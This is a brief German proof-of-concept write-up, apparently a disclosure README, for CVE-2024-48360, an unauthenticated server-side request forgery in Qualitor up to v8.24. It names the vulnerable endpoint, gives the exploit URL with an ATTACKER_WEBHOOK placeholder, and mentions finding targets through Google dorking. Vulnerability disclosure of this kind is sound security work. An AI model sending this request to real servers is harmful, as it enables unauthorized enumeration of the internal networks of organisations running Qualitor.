
CVE-2024-48360 Poc
CVE-2024-48360 | Qualitor <= v8.24 Nicht authentifizierte SSRF
Qualitor ist eine Plattform für das Geschäftsprozessmanagement, und dieses System ist in verschiedenen Unternehmen in Brasilien vorhanden, die einfach durch Google-Dorking identifiziert werden können.
Unser Team hat eine anfällige SSRF-Schwachstelle in der Anwendung identifiziert, die es ermöglicht, interne Systeme/Ports zu enumerieren.
Es wurde festgestellt, dass Qualitor v8.24 eine Server-Side Request Forgery (SSRF) über die Komponente /request/viewValidacao.php aufweist.
Zum Ausnutzen genügt es, eine Anfrage an host.com/html/ad/adformmobile/request/viewValidacao.php?url=ATTACKER_WEBHOOK zu senden; Sie erhalten die Anfrage vom verwundbaren Server.

https://www.linkedin.com/in/xvinicius/